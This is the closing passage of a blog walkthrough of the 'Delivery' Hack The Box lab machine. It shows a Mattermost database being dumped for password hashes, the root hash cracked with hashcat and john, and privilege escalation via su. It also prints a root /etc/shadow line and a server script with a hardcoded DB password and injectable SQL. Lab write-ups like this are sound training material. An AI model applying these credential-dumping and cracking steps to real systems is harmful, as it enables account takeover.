MariaDB [(none)]></span></span></span></code></pre></li><li id="https://www.notion.so/aa82ae9b73dd4e4783aa0e0dabe778d3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Server is running a MariaDB, let's try to enumerate the databases:</span></span><div id="https://www.notion.so/0cee5e63884349fe924bdde1b3b68078" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> show databases;</code></span></span></p></div><pre id="https://www.notion.so/3129cb0200d74a3c90c29b1e51925b9d" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+--------------------+
| Database |
+--------------------+
| information_schema |
| mattermost |
+--------------------+
2 rows in set (0.001 sec)</span></span></span></code></pre></li><li id="https://www.notion.so/026570c317744eb99e21f1a453e5dd13" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Select the MatterMost database:</span></span><div id="https://www.notion.so/009c1a8da2e945599d7e1b19cb390d5a" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> use mattermost;</code></span></span></p></div><pre id="https://www.notion.so/6bd412685a3740f487283fb58655f524" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>Database changed</span></span></span></code></pre></li><li id="https://www.notion.so/a4887d2da8224aafa772e1995a30be9d" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">List all tables within the MatterMot database:</span></span><div id="https://www.notion.so/07acc0af4d8c44e1ab5855ab3a1c9e14" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> show tables;</code></span></span></p></div><pre id="https://www.notion.so/bd0f99c0f8bb4f33afabc56457074bde" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+------------------------+
| Tables_in_mattermost |
+------------------------+
| ... |
| Tokens |
| UserAccessTokens |
| UserGroups |
| Users |
+------------------------+
46 rows in set (0.001 sec)</span></span></span></code></pre></li><li id="https://www.notion.so/35447c566f5d449db4017a802a0311d7" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">The table of interest is "Users", as password hashes are stored there:</span></span><div id="https://www.notion.so/6da05575015e4c79b9cc5fd3aa81890e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> select * from Users;</code></span></span></p></div><pre id="https://www.notion.so/be0e9a1a3cc7412ea5df26db947e1c4f" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+----------------------------------------------------------------------------------------------+-----------+-----------+
| Id | CreateAt | UpdateAt | DeleteAt | Username | Password | AuthData | AuthService | Email | EmailVerified | Nickname | FirstName | LastName | Position | Roles | AllowMarketing | Props | NotifyProps | LastPasswordUpdate | LastPictureUpdate | FailedAttempts | Locale | Timezone | MfaActive | MfaSecret |
+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+----------------------------------------------------------------------------------------------+-----------+-----------+
| 6akd5cxuhfgrbny81nj55au4za | 1609844799823 | 1609844799823 | 0 | c3ecacacc7b94f909d04dbfd308a9b93 | $2a$10$u5815SIBe2Fq1FZlv9S8I.VjU3zeSPBrIEg9wvpiLaS7ImuiItEiK | NULL | | [email protected] | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844799823 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| 6wkx1ggn63r7f8q1hpzp7t4iiy | 1609844806814 | 1609844806814 | 0 | 5b785171bfb34762a933e127630c4860 | $2a$10$3m0quqyvCE8Z/R1gFcCOWO6tEj6FtqtBn8fRAXQXmaKmg.HDGpS/G | NULL | | [email protected] | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844806814 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| dijg7mcf4tf3xrgxi5ntqdefma | 1608992692294 | 1609157893370 | 0 | root | $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO | NULL | | [email protected] | 1 | | | | | system_admin system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609157893370 | 0 | 0 | en | {"automaticTimezone":"Africa/Abidjan","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| hatotzdacb8mbe95hm4ei8i7ny | 1609844805777 | 1609844805777 | 0 | ff0a21fc6fc2488195e16ea854c963ee | $2a$10$RnJsISTLc9W3iUcUggl1KOG9vqADED24CQcQ8zvUm1Ir9pxS.Pduq | NULL | | [email protected] | 0 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844805777 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| jyb6rhmzyjbt9bjm5ioyddrcph | 1611061688514 | 1611061999208 | 0 | samiko | $2a$10$/COTMMxieAd/HLdic8eb4uW4YGdJ7wHqn0ZJMtiM4ogCo8Mv62giO | NULL | | [email protected] | 1 | | | | | system_user | 1 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1611061688514 | 0 | 0 | en | {"automaticTimezone":"Australia/Adelaide","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
| n9magehhzincig4mm97xyft9sc | 1609844789048 | 1609844800818 | 0 | 9ecfb4be145d47fda0724f697f35ffaf | $2a$10$s.cLPSjAVgawGOJwB7vrqenPg2lrDtOECRtjwWahOzHfq1CoFyFqm | NULL | | [email protected] | 1 | | | | | system_user | 0 | {} | {"channel":"true","comments":"never","desktop":"mention","desktop_sound":"true","email":"true","first_name":"false","mention_keys":"","push":"mention","push_status":"away"} | 1609844789048 | 0 | 0 | en | {"automaticTimezone":"","manualTimezone":"","useAutomaticTimezone":"true"} | 0 | |
+----------------------------+---------------+---------------+----------+----------------------------------+--------------------------------------------------------------+----------+-------------+-------------------------+---------------+----------+--------------------+----------+----------+--------------------------+----------------+-------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------------+-------------------+----------------+--------+----------------------------------------------------------------------------------------------+-----------+-----------+</span></span></span></code></pre></li><li id="https://www.notion.so/47b9642481e64dc89fda71f744f2f7ff" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Let's refine our search:</span></span><div id="https://www.notion.so/6556a03c55b044a68db61d9c48d5f9a6" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">> select Password from Users where Username = 'root';</code></span></span></p></div><pre id="https://www.notion.so/b9dd2fde6002441f894c3ee689db8906" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>+--------------------------------------------------------------+
| Password |
+--------------------------------------------------------------+
| $2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO |
+--------------------------------------------------------------+
1 row in set (0.001 sec)</span></span></span></code></pre></li><li id="https://www.notion.so/4c967fe9934843758a71c5bf942a61e8" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found root hash:</span></span><div id="https://www.notion.so/2d8e07c7a66c4429b70f2f7a42f729cd" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO</code></span></span></p></div></li><li id="https://www.notion.so/ba36462d9a4145388dd7fcbd993dbdae" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Cracking the hash with hashcat and john:</span></span><div id="https://www.notion.so/598c639939f748a7b8f27836e2477b46" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ echo 'PleaseSubscribe!' | hashcat -r ../Common/OneRuleToRuleThemAll.rule --stdout > hash.out</code></span></span></p></div><div id="https://www.notion.so/51d8dba4e4d6437cad3003f1e917cb81" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ john -w=hash.out hash</code></span></span></p></div></li><li id="https://www.notion.so/09c80168a4a24065be1eac53b4f8da43" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root credentials:</span></span><div id="https://www.notion.so/27f373d9b9bf4473bdb1c5bcde0c35aa" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root:PleaseSubscribe!21</code></span></span></p></div></li><li id="https://www.notion.so/241aba5f9009484c9f8c361d0ee4a5ce" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Elevate privileges:</span></span><div id="https://www.notion.so/d3530076d3224c348829664805494df1" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">$ su</code></span></span></p></div><div id="https://www.notion.so/686dc1a8c1d048068d5ff3fb58365124" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">PleaseSubscribe!21</code></span></span></p></div></li><li id="https://www.notion.so/7c4e438f52a1438bb1028e596910efe3" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get root flag!</span></span></li></ul><h2 id="https://www.notion.so/0c8f06b6efc848c8a2d791f9c39d7bcc" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/0c8f06b6efc848c8a2d791f9c39d7bcc"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Post-exploitation</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/d1a4984bcd6d4761a0f2453080700cf1" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Found a cool note on the root directory from the box maker, ippsec himself:</span></span><pre id="https://www.notion.so/9df994595e0d4fb6bdb6f5304ef2f689" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span>I hope you enjoyed this box, the attack may seem silly but it demonstrates a pretty high risk vulnerability I've seen several times. The inspiration for the box is here:
- </span></span><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c"><span>https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c</span></a></span><span class="SemanticString"><span>
Keep on hacking! And please don't forget to subscribe to all the security streamers out there.
- ippsec</span></span></span></code></pre></li><li id="https://www.notion.so/16731d8a299c47538d90ff418f020ccb" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">We find the </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">@delivery.htb</code></span><span class="SemanticString"> regex check in </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/root/py-smtp.py</code></span><span class="SemanticString">:</span></span><pre id="https://www.notion.so/37474c27025b4252978a88db0414d9ef" class="Code Code--NoWrap"><code><span class="SemanticStringArray"><span class="SemanticString"><span><span class="token keyword">if</span> re<span class="token punctuation">.</span>search<span class="token punctuation">(</span><span class="token string">r'^[0-9]*@delivery.htb$'</span><span class="token punctuation">,</span> rcpttos<span class="token punctuation">)</span><span class="token punctuation">:</span>
ticket <span class="token operator">=</span> rcpttos<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">'@'</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>
db <span class="token operator">=</span> pymysql<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token string">"localhost"</span><span class="token punctuation">,</span><span class="token string">"ost_user"</span><span class="token punctuation">,</span><span class="token string">"!H3lpD3sk123!"</span><span class="token punctuation">,</span> <span class="token string">"osticket"</span> <span class="token punctuation">)</span>
cursor <span class="token operator">=</span> db<span class="token punctuation">.</span>cursor<span class="token punctuation">(</span><span class="token punctuation">)</span>
cursor<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"SELECT ticket_id from ost_ticket where number = '</span><span class="token interpolation"><span class="token punctuation">{</span>ticket<span class="token punctuation">}</span></span><span class="token string">'"</span></span><span class="token punctuation">)</span>
result <span class="token operator">=</span> cursor<span class="token punctuation">.</span>fetchone<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">0</span><span class="token punctuation">]</span>
<span class="token keyword">if</span> result<span class="token punctuation">:</span>
cursor<span class="token punctuation">.</span>execute<span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f"UPDATE ost_thread_entry SET body = '</span><span class="token interpolation"><span class="token punctuation">{</span>data<span class="token punctuation">}</span></span><span class="token string">' WHERE thread_id = '</span><span class="token interpolation"><span class="token punctuation">{</span>result<span class="token punctuation">}</span></span><span class="token string">'"</span></span><span class="token punctuation">)</span>
db<span class="token punctuation">.</span>commit<span class="token punctuation">(</span><span class="token punctuation">)</span>
db<span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span></span></span></span></code></pre></li></ul><h2 id="https://www.notion.so/2fc684d256274723b5a1e4d8bcafe2b5" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/2fc684d256274723b5a1e4d8bcafe2b5"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Persistence</span></span></h2><ul class="BulletedListWrapper"><li id="https://www.notion.so/9b76103a9b0f4e4faedf754b89779d55" class="BulletedList"><span class="SemanticStringArray"><span class="SemanticString">Get the root user hash from </span><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">/etc/shadow</code></span><span class="SemanticString">:</span></span><div id="https://www.notion.so/f2a439a940e549668ba58bbd35eadd5e" class="ColorfulBlock ColorfulBlock--ColorDefault Text"><p class="Text__Content"><span class="SemanticStringArray"><span class="SemanticString"><code class="SemanticString__Fragment SemanticString__Fragment--Code">root:$6$Zgefgue1ExBT80dl$uTb2.giC3XGWRl55oIq94jD50ylT5ZfE9eghl.YP92co.M.gJB5jPGNlbgGQSczIibtyn.jZtOyIseVvXrM2V0:18624:0:99999:7:::</code></span></span></p></div></li></ul><h2 id="https://www.notion.so/eb334614ebce4e728068601c3d6bba48" class="ColorfulBlock ColorfulBlock--ColorDefault Heading Heading--2"><a class="Anchor" href="#https://www.notion.so/eb334614ebce4e728068601c3d6bba48"><svg width="16" height="16" viewBox="0 0 16 16"><path fill-rule="evenodd" d="M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z"></path></svg></a><span class="SemanticStringArray"><span class="SemanticString">Resources</span></span></h2><ol class="NumberedListWrapper"><li id="https://www.notion.so/0229b180525c477a8138738f9ba3633e" class="NumberedList" value="1"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://github.com/NotSoSecure/password_cracking_rules">https://github.com/NotSoSecure/password_cracking_rules</a></span></span></li><li id="https://www.notion.so/c94391b1a59c474abc168ce32f3df7d1" class="NumberedList" value="2"><span class="SemanticStringArray"><span class="SemanticString"><a class="SemanticString__Fragment SemanticString__Fragment--Link" href="https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c">https://medium.com/intigriti/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c</a></span></span></li></ol></article>
<footer class="Footer">
<div>[email protected]~$</div>
<div>·</div>
<div>Powered by <a href="https://github.com/dragonman225/notablog" target="_blank" rel="noopener noreferrer">Notablog</a>.</div>
</footer>
</body>
</html>